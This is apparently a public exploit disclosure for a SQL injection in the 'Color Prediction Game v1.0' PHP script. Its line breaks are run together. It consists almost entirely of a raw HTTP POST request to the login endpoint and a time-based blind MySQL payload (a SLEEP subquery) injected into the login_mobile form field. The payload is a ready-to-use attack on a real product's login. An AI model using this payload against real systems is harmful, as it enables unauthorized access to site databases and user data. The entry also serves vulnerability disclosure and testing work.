Color Prediction Game 1.0 SQL Injection

# Exploit Title: Color Prediction Game v1.0 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /loginNow.php HTTP/1.1Host: localhostCookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------395879129218961020344050490865Content-Length: 434Origin: http://localhostReferer: http://localhost/login.phpSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--### Parameter & Payloads ###Parameter: MULTIPART login_mobile ((custom) POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: -----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--